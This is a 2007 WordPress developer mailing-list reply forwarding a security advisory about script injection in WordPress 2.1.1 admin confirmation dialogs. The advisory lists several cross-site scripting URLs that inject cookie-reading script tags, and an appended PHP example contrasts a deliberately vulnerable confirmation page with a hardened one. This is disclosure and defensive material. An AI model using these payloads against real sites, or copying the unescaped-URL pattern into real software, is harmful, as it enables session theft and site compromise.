[wp-hackers] FW: [Full-disclosure] Wordpress 2.1.1 - Multiple Script Injection Vulnerabilities

Mark Jaquith mark.wordpress at txfx.net
Thu Mar 1 04:19:41 GMT 2007


Already fixed.  This is the same bug as in the Secunia advisory.  The
fix was a different one than advised by Secunia, because Secunia
misdiagnosed the issue.  It's not that there is an unvalidated
parameter... it is that the URL itself is spit back out without being
sanitized.  So any parameter (even made up ones) can be the cause of
the HTML injection.

On Feb 27, 2007, at 7:00 PM, Ross M. W. Bennetts wrote:

> -----Original Message-----
> From: full-disclosure-bounces at lists.grok.org.uk
> [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Stefan
> Friedli
> Sent: Wednesday, 28 February 2007 2:10 AM
> To: bugtraq at securityfocus.com
> Cc: full-disclosure at lists.grok.org.uk; news at securiteam.com;
> support at secunia.com
> Subject: [Full-disclosure] Wordpress 2.1.1 - Multiple Script Injection Vulnerabilities
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Wordpress 2.1.1 - Multiple Script Injection Vulnerabilities
>
> scip AG Vulnerability ID 2962 (02/27/2007)
> http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2962
>
> I. INTRODUCTION
>
> "WordPress is a state-of-the-art semantic personal publishing platform
> with a focus on aesthetics, web standards, and usability."
> More information is available on the project web site at the following URL:
>
>      http://www.wordpress.org
>
> II. DESCRIPTION
>
> Stefan Friedli found several vulnerabilities based on an advisory
> entitled "WordPress AdminPanel CSRF/XSS - 0day" by "Samenspender" which
> described a lack of input validation when deleting posts that allows
> injection of arbitrary code. The vulnerability was reported on February
> 26th and is referenced in section VII.
>
> Further to this vulnerability, which was limited to manipulating the
> "post" parameter, there are several other vulnerabilities which are very
> similar to the one mentioned above. Every operation that makes use of
> the common confirm dialog is vulnerable to this type of attack.
>
> Possible injection...
>
> ... when deleting posts as mentioned in Samenspender's advisory
> (unvalidated parameter: post, file: post.php)
> http://target.tld/wp-admin/post.php?action=delete&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
>
> ... when deleting comments (unvalidated parameter: c, file: comment.php)
> http://target.tld/wp-admin/comment.php?action=deletecomment&p=39&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
>
> ... when deleting pages (unvalidated parameter: page, file: page.php)
> http://target.tld/wp-admin/page.php?action=delete&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
>
> ... when deleting categories (unvalidated parameter: cat_ID, file: categories.php)
> http://target.tld/wp-admin/categories.php?action=delete&cat_ID='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
>
> ... when deleting comments (unvalidated parameter: c, file: comment.php)
> http://target.tld/wp-admin/comment.php?action=deletecomment&p=35&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
>
> IV. IMPACT
>
> This list may not be exhaustive. It illustrates that the flaw with
> confirmation dialogs in Wordpress is not limited to the "Delete
> Post"-function. Fixing the validation of the post parameter as suggested
> by e.g. Secunia does not fix the problem and does not reduce the threat
> of cross-site scripting or any other web-based exploitation.
>
> V. DETECTION
>
> These flaws can be detected by using any web browser.
>
> VI. SOLUTION
>
> Until these issues are patched, possible workarounds are manual fixing
> or the usage of an application-level filter like mod_security for
> Apache.
>
> VII. SOURCES
>
> Samenspender - WordPress AdminPanel CSRF/XSS - 0day
> http://seclists.org/bugtraq/2007/Feb/0494.html
>
> scip AG - Security Consulting Information Process (german)
> http://www.scip.ch
>
> scip AG Vulnerability Database (german)
> http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2962
>
> VIII. DISCLOSURE TIMELINE
>
> 02/26/07 Release of "Delete Post"-Confirmation Vulnerability
> 02/27/07 Identification of further vulnerabilities
> 02/27/07 Immediate Release for informational purposes
>
> IX. CREDITS
>
> The vulnerabilities were discovered by Stefan Friedli.
>
>      Stefan Friedli, scip AG, Zuerich, Switzerland
>      stfr-at-scip.ch
>      http://www.scip.ch
>
> A2. LEGAL NOTICES
>
> Copyright (c) 2007 scip AG, Switzerland.
>
> Permission is granted for the re-distribution of this alert. It may not
> be edited in any way without permission of scip AG.
>
> The information in the advisory is believed to be accurate at the time
> of publishing based on currently available information. There are no
> warranties with regard to this information. Neither the author nor the
> publisher accepts any liability for any direct, indirect or
> consequential loss or damage from use of or reliance on this advisory.
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGP Desktop 9.0.6
>
> iQA/AwUBReRJv1J79Mw3xa1EEQJXagCdHOT7ib4I8XSqMsaUAKA8vaO8i8QAn2SS
> oTWNsT+cOMwFq+XKsZqq6yJ/
> =REO6
> -----END PGP SIGNATURE-----
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers

--
Mark Jaquith
http://markjaquith.com/

Covered Web Services
http://coveredwebservices.com/
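The mechanism Mark describes, as an added illustration that is not part of either message above and is not WordPress code: a stand-in for an admin "Are you sure?" confirmation page that copies the raw request URI into its "Yes" link, beside a rebuilt version that regenerates the link from an allow-list of validated parameters and escapes it on output. The parameter names, the regex checks and the sample request URIs are assumptions made for the example; the `madeup` parameter is there to show Mark's point that a parameter the script never reads still injects, so validating `post` alone changes nothing.

```php
<?php
// Added illustration for this thread; it is NOT WordPress code. It is a minimal
// stand-in for an admin "Are you sure?" confirmation page, first with the flaw
// Mark describes (the raw request URI is echoed into the "Yes" link), then
// rebuilt so that no request-controlled string reaches the HTML unescaped.

// Vulnerable: the link is built from $_SERVER['REQUEST_URI'] (passed in here as
// $request_uri). Validating "post" alone cannot help, because every parameter
// on the URI, including ones the script never reads, is copied into the page.
function confirm_page_vulnerable(string $request_uri): string
{
    return '<p>Are you sure you want to do this?</p>'
         . '<a href="' . $request_uri . '&_confirm=1">Yes</a>';
}

// Hardened: rebuild the link from an allow-list of parameters (assumed names
// for this example), validate each one, and escape the finished URL for an
// HTML attribute. Unknown parameters such as "madeup" are simply dropped.
// In a real script $script should be the script's own known name, not a
// request-derived path; it is taken from the URI here only to stay self-contained.
function confirm_page_hardened(string $script, array $query): string
{
    $allowed = [
        'action' => '/^[a-z_]+$/',
        'post'   => '/^\d+$/',
        'p'      => '/^\d+$/',
        'c'      => '/^\d+$/',
        'cat_ID' => '/^\d+$/',
    ];
    $clean = [];
    foreach ($allowed as $name => $pattern) {
        if (isset($query[$name]) && is_string($query[$name])
                && preg_match($pattern, $query[$name]) === 1) {
            $clean[$name] = $query[$name];
        }
    }
    // Every confirmable action needs an action name and at least one object id.
    if (!isset($clean['action']) || count($clean) < 2) {
        return '<p>Invalid request.</p>';
    }
    $clean['_confirm'] = '1';
    $url = $script . '?' . http_build_query($clean);   // percent-encodes values
    return '<p>Are you sure you want to do this?</p>'
         . '<a href="' . htmlspecialchars($url, ENT_QUOTES, 'UTF-8') . '">Yes</a>';
}

// True when a script element ended up in the generated markup.
function contains_injected_script(string $html): bool
{
    return stripos($html, '<script') !== false;
}

// Constructed request URIs (not taken from the advisory): a legitimate delete,
// a payload in the documented "post" parameter, and the same payload in a
// parameter the script never looks at. The example assumes the client sends
// the angle brackets and quotes unencoded, as some clients do.
$samples = [
    '/wp-admin/post.php?action=delete&post=39',
    '/wp-admin/post.php?action=delete&post="><script>alert(1)</script>',
    '/wp-admin/post.php?action=delete&post=39&madeup="><script>alert(1)</script>',
];

foreach ($samples as $uri) {
    [$script, $qs] = array_pad(explode('?', $uri, 2), 2, '');
    parse_str($qs, $query);

    $bad  = confirm_page_vulnerable($uri);
    $good = confirm_page_hardened($script, $query);

    echo "REQUEST:    $uri\n";
    echo '  vulnerable injected: ' . (contains_injected_script($bad) ? 'yes' : 'no') . "\n";
    echo '  hardened injected:   ' . (contains_injected_script($good) ? 'yes' : 'no') . "\n";
    echo "  hardened output:     $good\n\n";
}
```

Run it with the php command-line binary. The third request is the one that matters for Mark's diagnosis: its `post` value is a perfectly valid integer, yet the vulnerable page still emits a script element because the whole URI, `madeup` included, is echoed; the rebuilt page drops the unknown parameter and escapes the URL it generates, so the fix lives at the output, not in the validation of any one parameter.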



